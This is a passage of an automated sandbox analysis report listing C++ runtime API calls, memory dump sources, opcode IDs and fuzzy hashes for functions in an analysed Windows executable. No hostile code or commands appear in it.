                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0110D0211E7D140EBAA823DC54D74B6E819703A3CE3CC39886F4084F3CAABC65BD796
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e3af4e3ca42a1296133f13b0ceff370dd2e55c04caf61310cde177cbd1dda9b
                                                                                                                                                                                                                                                                                      • Instruction ID: ee0825c0bf6082b820d9a14cfc528780d69a995cf4963b0b1ee8d37fec51a1da
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e3af4e3ca42a1296133f13b0ceff370dd2e55c04caf61310cde177cbd1dda9b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1A00161908802D0E6449B01A86092822B0BF51748BB00531D00E810A0EEADA4089380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,0000006E00000006,?,00007FF60C47492E), ref: 00007FF60C47FCD3
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,0000006E00000006,?,00007FF60C47492E), ref: 00007FF60C47FD26
                                                                                                                                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,0000006E00000006,?,00007FF60C47492E), ref: 00007FF60C47FD4F
                                                                                                                                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,0000006E00000006,?,00007FF60C47492E), ref: 00007FF60C47FD76
                                                                                                                                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,0000006E00000006,?,00007FF60C47492E), ref: 00007FF60C47FDBC
                                                                                                                                                                                                                                                                                      • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,0000006E00000006,?,00007FF60C47492E), ref: 00007FF60C47FDC3
                                                                                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,0000006E00000006,?,00007FF60C47492E), ref: 00007FF60C47FDD0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1492985063-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0e00ef6eae93382b2515f7068371fe31d3a87f40968e56335f948453ab161360
                                                                                                                                                                                                                                                                                      • Instruction ID: 3f4225d99777c7f0481b6c29497188b146bfcf5f5dd57206eba16b6c73c25544
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e00ef6eae93382b2515f7068371fe31d3a87f40968e56335f948453ab161360
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57512122609A4185FB208F59E594238A7A0FF85F99F65C631CE5F877A0CF7DD44A9300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,?,00000000,?,?,038E38E38E38E38E,?,00007FF60C471752), ref: 00007FF60C481428
                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,?,00000000,?,?,038E38E38E38E38E,?,00007FF60C471752), ref: 00007FF60C481497
                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,?,00000000,?,?,038E38E38E38E38E,?,00007FF60C471752), ref: 00007FF60C481605
                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,?,00000000,?,?,038E38E38E38E38E,?,00007FF60C471752), ref: 00007FF60C4816CF
                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,?,00000000,?,?,038E38E38E38E38E,?,00007FF60C471752), ref: 00007FF60C48175D
                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,?,00000000,?,?,038E38E38E38E38E,?,00007FF60C471752), ref: 00007FF60C4817B4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0a07830a85a956891ebb2fd093bf6d0223c25d0ef3af85813984afeefcc8d28c
                                                                                                                                                                                                                                                                                      • Instruction ID: 780f93068500362ddc0eb70137ab7df984939aedbee9d17840c535ff5963ae46
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a07830a85a956891ebb2fd093bf6d0223c25d0ef3af85813984afeefcc8d28c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FD16162A0878596EB609F16D144A7C27A1FF04F8CF684436CF5E87785CFB8E59AD380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __std_fs_code_page.MSVCPRT ref: 00007FF60C47DEBF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C48271C: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF60C47DEC4), ref: 00007FF60C482720
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C48271C: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF60C47DEC4), ref: 00007FF60C48272F
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF60C47E02C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C4807C0: memcpy.VCRUNTIME140 ref: 00007FF60C4808A1
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF60C47E07A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememcpy
                                                                                                                                                                                                                                                                                      • String ID: ", "$: "
                                                                                                                                                                                                                                                                                      • API String ID: 2077005984-747220369
                                                                                                                                                                                                                                                                                      • Opcode ID: 3362224bf7d1a975f31533d70ad6a670e4df8ae2cedaaf14d35cedcc3d50a539
                                                                                                                                                                                                                                                                                      • Instruction ID: f7fdc30a7d553fe054b64e9dfa4d69b0ab8e56eb79af2cd1c1b010431a7faac8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3362224bf7d1a975f31533d70ad6a670e4df8ae2cedaaf14d35cedcc3d50a539
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95616862B14B4189FB10DFA5E4403AC23A1FF48B8CF209635EE6DA7B99DE78D155D380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmp$Xout_of_range@std@@_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID: invalid map<K, T> key
                                                                                                                                                                                                                                                                                      • API String ID: 3077429687-1394099236
                                                                                                                                                                                                                                                                                      • Opcode ID: 969323784d1f45ec45f27e8de16adf704a53bf40400c93b83ec683043aea8e1e
                                                                                                                                                                                                                                                                                      • Instruction ID: f67e408ab5f34be51e215107208613105cbffae4b03ef81769c30f4c1b5ae955
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 969323784d1f45ec45f27e8de16adf704a53bf40400c93b83ec683043aea8e1e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E351B5A2A08A82C6EA349F15D04037D6361FF55FCCF644132DE4D8769ADFBCD995A380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF60C471052), ref: 00007FF60C480714
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF60C471052), ref: 00007FF60C480764
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF60C471052), ref: 00007FF60C48076E
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF60C4807B7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID: black
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-2307242536
                                                                                                                                                                                                                                                                                      • Opcode ID: 229569c60d9962ade7e70dddc43be52c344afd42601d6723b834f776f443f2a2
                                                                                                                                                                                                                                                                                      • Instruction ID: b3f95e2a33614b88676b64d221acf45321402ddc2ce2195a766fde5bad4226b4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 229569c60d9962ade7e70dddc43be52c344afd42601d6723b834f776f443f2a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9841AE66B14A4191ED24DB11E504A7D62A0BF44BE8FA44731DE7D87BE8EEBCE04AC340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1738892800-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 609484b54ff4ea8985d99bfa3aaebe28ad51f0f8ea16a50fa31845536ea61992
                                                                                                                                                                                                                                                                                      • Instruction ID: a48795a4b73ffc343745b2656a82747a9b6988afaafd8b582c007292a5c19edd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 609484b54ff4ea8985d99bfa3aaebe28ad51f0f8ea16a50fa31845536ea61992
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E41D272B18A8185EA249B26E104B6D6291BF04FD8F644631DFAD87BD5DEBCD049C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a241d259bc2700a2aa16cec828c0616111b49298314d3acab3a605d428b55043
                                                                                                                                                                                                                                                                                      • Instruction ID: 8bc67fde08518c06f6e3dd4ba94819b6d32e64421148a8ae2cf27e92c2c00d67
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a241d259bc2700a2aa16cec828c0616111b49298314d3acab3a605d428b55043
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E411262B18A8280EE249F52A404B6EA751FF04FDCF644631DF6D8B7D5DEBCE0899340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2542180945-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
                                                                                                                                                                                                                                                                                      • Instruction ID: c064417aaabfd957b8faf000714514b09eed9ac92934c527792524a1d314b869
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF0F937605B45CAD7159F21E8904AC3764FB48B8CB596131FE8D87755CF78D895C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2138705365-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d13a81ff7fbb2b89892c9d6fb325dc01875895df5e0093a5482ade1b3b95cbe7
                                                                                                                                                                                                                                                                                      • Instruction ID: a721164dced85d9808944bb4ff611fb119a5985e95575aad0f6fef9a434039e5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d13a81ff7fbb2b89892c9d6fb325dc01875895df5e0093a5482ade1b3b95cbe7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51817172A04A8295EB04DF29E58436C2366FF44F8CF648131DB4D47A69DFB9D8D9D380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 26e7bcb28e786ac2cca84ca431f374278eb1da29d0471fa7efacfecb7e069e4c
                                                                                                                                                                                                                                                                                      • Instruction ID: 019d2db43efbd5f20864e6881992a5e936bfd387cd3cc15ae75145b790963ee9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26e7bcb28e786ac2cca84ca431f374278eb1da29d0471fa7efacfecb7e069e4c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C312332B0878184EE249F22A10476D6252BF04BD8FA44234DF6D47BD9DFBCE099C380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,?,?,00007FF60C47F6A9,?,?,00000004,00007FF60C47DF54), ref: 00007FF60C48049C
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,00007FF60C47F6A9,?,?,00000004,00007FF60C47DF54), ref: 00007FF60C4804D0
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,?,?,00007FF60C47F6A9,?,?,00000004,00007FF60C47DF54), ref: 00007FF60C4804DA
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF60C480503
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4ba097ff8c18960a3a511d0fc660cf841aa7d74a028dbf5a3aef5823864bb332
                                                                                                                                                                                                                                                                                      • Instruction ID: 408d5708352e943ea8abf9f6bc426597b9eb7f62556e411c1b3d9fe387f8d0d3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ba097ff8c18960a3a511d0fc660cf841aa7d74a028dbf5a3aef5823864bb332
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031B071B6864285EE209B12A1047ADA255FF04FE8F644631DF6D877D5DEBCE0898380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 326894585-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a7e5c26fbf924ee40aef1f20daa284d7027face585d4f2f683699a8e21f88c15
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f0a8e071a24b71ba734b8073417bba1ee2574f46301193b35a522131242a1e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e5c26fbf924ee40aef1f20daa284d7027face585d4f2f683699a8e21f88c15
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5621D862A0974685FA259F11A44077D1290BF047B8F740730DF6D877D6DFFCA4999390
